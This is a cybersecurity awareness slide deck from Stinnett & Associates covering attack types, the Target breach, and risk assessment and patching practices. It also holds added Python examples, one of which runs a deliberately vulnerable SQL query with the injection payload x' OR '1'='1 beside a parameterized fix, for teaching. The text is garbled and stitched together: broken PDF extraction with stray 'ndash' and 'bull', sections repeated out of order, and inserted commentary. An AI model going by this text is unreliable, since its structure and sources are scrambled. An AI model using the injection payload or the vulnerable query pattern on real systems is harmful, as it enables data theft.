SQL Injection and Cross-site Scripting Attacks – An attack in which the attacker injects malicious code into a website. In SQL injection, the attacker uses SQL language to obtain information back from the website that was unintended. In cross-site scripting, the attacker injects code that only impacts other users of the website.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the software and hardware running the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things (IoT) – A computing concept that describes everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
Bot – A software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each infected with malware and running one or more bots. Botnets can be used to perform distributed denial of service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A DDoS attack is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected members of a botnet.
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack in which the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack in which the attacker injects malicious code into a website. In SQL injection the attacker uses the SQL language to obtain information back from the website that was unintended. In cross-site scripting the attacker injects code that only impacts other users of the website.
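The SQL injection definition above, as an added example that is not part of the presentation: a lookup that splices user input into the SQL text, beside the parameterized version that treats the same input as plain data. The table, rows and inputs are constructed for illustration.

```python
"""Added example (not from the presentation): the SQL injection risk described
above, shown as a vulnerable query beside its parameterized fix, using an
in-memory SQLite database with constructed sample rows."""
import sqlite3

# Constructed sample data standing in for a website's customer table.
SAMPLE_ROWS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Defect on purpose: the input is pasted into the SQL text, so it can
    # change the structure of the WHERE clause instead of acting as a value.
    query = f"SELECT username, email FROM customers WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    # Fix: a bound parameter is always handled as data by the database driver,
    # so the same input can only ever match a literal username.
    query = "SELECT username, email FROM customers WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def demo() -> dict:
    """Row counts returned by each version for a normal and a crafted input."""
    conn = make_db()
    normal = "alice"
    crafted = "x' OR '1'='1"  # constructed input that rewrites the WHERE clause
    return {
        "vulnerable_normal": len(lookup_vulnerable(conn, normal)),
        "vulnerable_crafted": len(lookup_vulnerable(conn, crafted)),
        "safe_normal": len(lookup_safe(conn, normal)),
        "safe_crafted": len(lookup_safe(conn, crafted)),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable version hands back every row for the crafted input, which is exactly the "information the website never intended to return" the definition describes; the parameterized version returns nothing.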
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years, but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the dark web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process, that is, the amount of computing power involved, increases.
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (using a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W2 phishing data (IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts.
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies.
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of bitcoins is typically the payment method.
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016.
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm).
COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
- Web app attacks
- POS intrusions
- Privilege misuse
- Cyber-espionage
- Crimeware
63% of all breaches are attributable to the top 2 alone.
Common attack patterns account for a vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach.
• Recycled or unchanged default passwords can compromise an organization's security efforts.
• Breaching a web application can open the gates to internal applications and code.
• Cross-site scripting and SQL injection are the most common attack attempts.
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions.
• Attacks can exploit POS software or hardware.
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system.
• Retail and accommodation sites are experiencing massive POS attacks.
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach.
• Most actors are outside executive management and leadership roles.
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation.
• Most breaches take months or longer to discover.
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems.
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites).
• Over 90% of breaches target trade secrets for exfiltration.
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity.
• Ransomware, keyloggers and the use of backdoors are the most common occurrences of crimeware.
• Crimeware is typically introduced through the following:
- Email attachment
- Cross-site scripting from a visited website
- Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen.
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers.
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016.
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide).
• Bank of Bangladesh (February 2016) – $81 million stolen.
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through the use of malware introduced via a phishing campaign.
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices.
• Injected code into a vulnerability of the electronic submission process to gain further access to Target's internal network.
• Performed reconnaissance of the environment and obtained domain administrator access.
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location, working around firewalls and other defenses.
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers.
• Attackers then gained access to the POS environment (which should have been walled off).
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application.
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information.
• Attackers then copied credit card files to another server that had remote FTP ability and sent the files to themselves.
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist.
• Risk assessments should be performed annually or when significant changes to the environment occur.
• Stinnett uses Microsoft STRIDE threat modeling to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks.
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets.
• What value do the assets have?
- Credit card data
- Employee or customer records
- Bank accounts
- Intellectual property
- Trade secrets
- Insider knowledge
• Who would want the data?
• Data location
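The asset identification, classification and STRIDE threat-modeling steps described above, carried through as an added example (not Stinnett's own method or tooling): each asset gets a likelihood per STRIDE category and an impact from its classification, and the product ranks the assets. The asset names, locations, 1-5 scales and scores are constructed assumptions.

```python
"""Added example (not Stinnett's method): a simple STRIDE-style risk scoring
over a constructed asset inventory. Names, locations, classifications and the
1-5 likelihood/impact scales are assumptions for illustration only."""
from dataclasses import dataclass, field

# The six STRIDE threat categories from Microsoft threat modeling.
STRIDE = ("Spoofing", "Tampering", "Repudiation", "Information disclosure",
          "Denial of service", "Elevation of privilege")

# Assumed impact weight by data classification (1-5 scale).
CLASSIFICATION_IMPACT = {"public": 1, "internal": 2, "confidential": 4, "restricted": 5}


@dataclass
class Asset:
    name: str
    location: str          # where the data lives (the "Data Location" question)
    classification: str    # drives impact (the "What value" question)
    # Likelihood (1-5) that each STRIDE threat is realised against this asset,
    # as judged in an assessment workshop; unlisted categories default to 1.
    likelihood: dict = field(default_factory=dict)


def score_asset(asset: Asset) -> dict:
    """Risk per threat = likelihood x impact, plus the asset's worst and total."""
    impact = CLASSIFICATION_IMPACT[asset.classification]
    per_threat = {t: asset.likelihood.get(t, 1) * impact for t in STRIDE}
    return {"asset": asset.name, "location": asset.location,
            "per_threat": per_threat,
            "max_risk": max(per_threat.values()),
            "total_risk": sum(per_threat.values())}


def prioritize(assets: list) -> list:
    """Rank assets by their single worst threat, then by total exposure."""
    scored = [score_asset(a) for a in assets]
    return sorted(scored, key=lambda s: (s["max_risk"], s["total_risk"]), reverse=True)


def top_threat(result: dict) -> str:
    """The STRIDE category contributing the most risk for one scored asset."""
    return max(result["per_threat"], key=result["per_threat"].get)


# Constructed inventory mirroring the asset types named in the slides.
INVENTORY = [
    Asset("Cardholder data (POS)", "POS network segment", "restricted",
          {"Tampering": 4, "Information disclosure": 5, "Elevation of privilege": 3}),
    Asset("Employee HR records", "HR SaaS provider", "confidential",
          {"Spoofing": 4, "Information disclosure": 3}),
    Asset("Treasury bank portal", "Internet (bank hosted)", "restricted",
          {"Spoofing": 5, "Repudiation": 3}),
    Asset("Marketing website", "DMZ web server", "public",
          {"Tampering": 4, "Denial of service": 4}),
]

if __name__ == "__main__":
    for r in prioritize(INVENTORY):
        print(f"{r['max_risk']:>3} {r['total_risk']:>4}  {r['asset']}  "
              f"[{r['location']}]  worst: {top_threat(r)}")
```

The ranking is only as good as the likelihood judgements, which is why the slide pairs it with an annual reassessment and a review after significant environment changes.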
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place.
• Evaluate control design as it relates to commonly accepted framework(s).
• Identify control gaps and create a baseline for cybersecurity maturity in the organization.
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process.
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, the failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval).
• Implement a continual end user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
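The inventory-and-patch-risk fixes above, worked through as an added example that is not Stinnett's tooling: unpatched entries are scored higher when the device is internet facing, when the software is one of the families the slide singles out, and when the vendor patch has been available for more than a year (the threshold taken from the "more than a year after the patch" statistic). Device names, dates and the scoring weights are constructed assumptions.

```python
"""Added example (not from the presentation): a patch-risk review over a
constructed IT device inventory, following the 'Fixes' list. Devices, dates,
weights and the 365-day threshold are assumptions for illustration."""
from datetime import date

# Software families the slide names as having known, frequently exploited vulnerabilities.
HIGH_RISK_SOFTWARE = {"adobe", "java", "browser", "operating system"}

# Review date: the presentation date, used as "today" for the age calculation.
AS_OF = date(2017, 10, 27)

# Constructed inventory rows:
# (device, software family, internet facing?, vendor patch published, patch applied or None)
INVENTORY = [
    ("web-01", "operating system", True, date(2016, 3, 8), None),
    ("web-01", "java", True, date(2017, 4, 18), date(2017, 5, 1)),
    ("hr-laptop-17", "adobe", False, date(2016, 1, 12), None),
    ("pos-07", "operating system", False, date(2017, 3, 14), None),
    ("fin-ws-03", "browser", False, date(2017, 9, 5), date(2017, 9, 12)),
]


def patch_gaps(inventory: list, as_of: date, stale_after_days: int = 365) -> list:
    """Return every unpatched entry with a priority score, highest priority first.

    Score (assumed weights): 1 for any missing patch, +2 if the device is
    internet facing, +1 if the software is a high-risk family, +1 if the
    patch has been available longer than stale_after_days.
    """
    findings = []
    for device, software, internet_facing, published, applied in inventory:
        if applied is not None:
            continue  # patch already applied: nothing to report
        age = (as_of - published).days
        priority = 1
        if internet_facing:
            priority += 2
        if software in HIGH_RISK_SOFTWARE:
            priority += 1
        if age > stale_after_days:
            priority += 1
        findings.append({"device": device, "software": software,
                         "internet_facing": internet_facing,
                         "days_unpatched": age, "priority": priority})
    findings.sort(key=lambda f: (f["priority"], f["days_unpatched"]), reverse=True)
    return findings


if __name__ == "__main__":
    for f in patch_gaps(INVENTORY, AS_OF):
        print(f"P{f['priority']}  {f['device']:<14} {f['software']:<17} "
              f"{f['days_unpatched']:>4} days unpatched"
              f"{'  (internet facing)' if f['internet_facing'] else ''}")
```

A device that is not in the inventory never appears in this list, which is the second failure the slide calls out: the review is only as complete as the device inventory feeding it.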
QUESTIONS
www.stinnett-associates.com | 888.808.1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300, Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
